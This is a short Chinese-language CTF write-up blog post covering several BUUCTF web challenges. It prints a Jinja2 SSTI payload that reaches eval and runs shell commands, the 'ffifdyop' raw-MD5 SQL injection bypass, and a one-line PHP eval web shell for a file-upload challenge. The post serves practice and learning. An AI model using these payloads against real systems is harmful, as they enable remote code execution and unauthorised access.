Buu摸鱼日记(5)

 

buu摸鱼日记(5)

[BJDCTF 2nd]fake google

这题大威天龙,大胆妖孽,我一眼就看出他是SSTI

7*7}}7*'7'}}

可以判断他是flask框架

随手测试一下,发现甚至没有过滤

推断一下,是python3

拿burp爆破一下subclasses ,就可以得到要用的类

qaq?name=().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__.__builtins__['eval']("__import__('os').popen('find / -name \"flag*\"').read()")}}

于是读取目录,find命令查找flag 发现根目录里就有flag

然后cat flag 秒杀

这题不怎么难

[BJDCTF2020]Easy MD5

说实话,题目不难,就是想不到

文件头里有个Hint(根本没看到)

select * from ‘admin’ where password=md5($pass,true)

关键是md5($pass,true)要返回一个’’ or 1这样的东西

可以写个php来爆破,也可以网上找个Payload

ffifdyop 会形成’or’6<乱七八糟的值> 构成万能密码sql注入

后面一个是md5零值绕过 一个是数组绕过 都很简单,就不写了

[ACTF2020 新生赛]Upload

简单的传马(我居然把码写错了)

写一下重新记一下

<?php eval(@$_POST['a']);?>

[RoarCTF 2019]Easy Java

完全没学过java,所以原理并不很清楚,大致复现了一下(迷迷糊糊)

一个另类的文件包含